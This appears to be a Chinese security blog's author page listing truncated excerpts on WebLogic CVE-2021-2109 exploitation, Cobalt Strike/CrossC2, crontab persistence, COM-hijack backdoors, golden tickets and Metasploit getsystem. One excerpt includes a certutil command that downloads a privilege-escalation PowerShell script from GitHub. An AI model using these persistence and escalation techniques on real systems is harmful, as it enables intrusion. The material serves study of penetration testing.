
简介
该用户还未填写简介
擅长的技术栈
可提供的服务
暂无可提供的服务
文章目录1. 数据安全建设需要解决的问题1.1 敏感数据识别1.2 数据审计1.3 数据脱敏1.4 数据泄露检测与防护(DLP系统)1.5 数据恢复功能1.6 数据加解密功能2. 等保中对数据安全的要求与解决方案2.1 数据完整性2.2 数据保密性2.3 数据备份恢复1. 数据安全建设需要解决的问题1.1 敏感数据识别从海量数据中发现和锁定保护对象,通过内置算法规则和自定义敏感数据识别规则,对其存
文章目录1. cve-2021-2109 RCE1.1 原理1.2 利用1. 先用JNDIExploit启一个监听2. 抓包1. cve-2021-2109 RCE需要登录控制台或者配合 CVE-2020-14882 未授权访问漏洞即可实现rce。影响版本:WebLogic 10.3.6.0.0WebLogic 12.1.3.0.0WebLogic 12.2.1.3.0WebLogic 12.2.
CATALOG前言配置CS与CrossC2简单的使用前言CS主要用来做windows渗透,现通过CrossC2插件即可实现上线linux主机。CrossC2下载CrossC2官方手册其他须知:目前只支持cs3.14版本,经测试,4.0版本可以上线主机但无法执行其他任何操作。配置CS与CrossC2下载完成CrossC2后打开CrossC2.cna文件修改CC2_PATH路径为当前路径,并检查CC2
文章目录1.前言2.前置知识3.测试3.1 使用crontab来设置计划任务3.2 直接编辑文件设置计划任务4.总结5.参考文章1.前言在linux渗透测试的时候,有时会选择使用计划任务crontab来进行权限维持或者反弹shell,在自己做测试的时候遇见了几个特殊的点做一下记录。2.前置知识各个用户的计划任务文件存在/var/spool/cron/crontabs/中,以用户名来命名。系统级别的
文章目录1. 数据安全建设需要解决的问题1.1 敏感数据识别1.2 数据审计1.3 数据脱敏1.4 数据泄露检测与防护(DLP系统)1.5 数据恢复功能1.6 数据加解密功能2. 等保中对数据安全的要求与解决方案2.1 数据完整性2.2 数据保密性2.3 数据备份恢复1. 数据安全建设需要解决的问题1.1 敏感数据识别从海量数据中发现和锁定保护对象,通过内置算法规则和自定义敏感数据识别规则,对其存
CATALOG1.前言2.windows命名管道3.msf中getsystem原理4.参考文章1.前言之前已经写过了winodws命名管道相关的知识,在我的由psexec远控的实现原理到windows命名管道这篇文章中,最近复习的时候又看到了,同时对其有了新的理解,进而又想起了msf中getsystem的原理发现两者刚好有所关联,于是有了这篇文章。2.windows命名管道首先我们需要明确的一点,
前言看到一篇博客讲的一个powershell脚本,下载利用后确实可以成功,特作记录。实现脚本下载certutil -urlcache -split -f https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1在windows下启动一个administrator权限的powershell. .\psge
CATALOG前言操作过程对抗方法参考文章前言这是一种主动的后门触发方式,只要对方主机重启机器的操作,就会触发我们之前设置的dll。系统在启动时默认启动进程explorer.exe,如果劫持了COM对象MruPidlList,就能劫持进程explorer.exe,实现后门随系统开机启动,相当于是主动后门。而劫持MruPidlList劫持注册表中的一个{42aedc87-2188-41fd-b9a3
原理黄金票据的原理就是用krbtgt的hash来伪造TGT的内容。更改里面的client参数与session key等。让TGS以为我就是那个我所声称的人,当然我一般会声称自己是administrator。第四步主要是来验证客户端的身份。所谓的黄金票据其实就是kerberos认证的第二个阶段中的tgs的ticket也就是TGT。这个ticket相当于对请求端的一个身份认证的凭据,如果可以伪造这个t
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3ANX6p5X-1597048406819)(evernotecid://90B54479-F8FA-4F06-9F90-73E6593C6866/appyinxiangcom/27458002/ENResource/p155)]







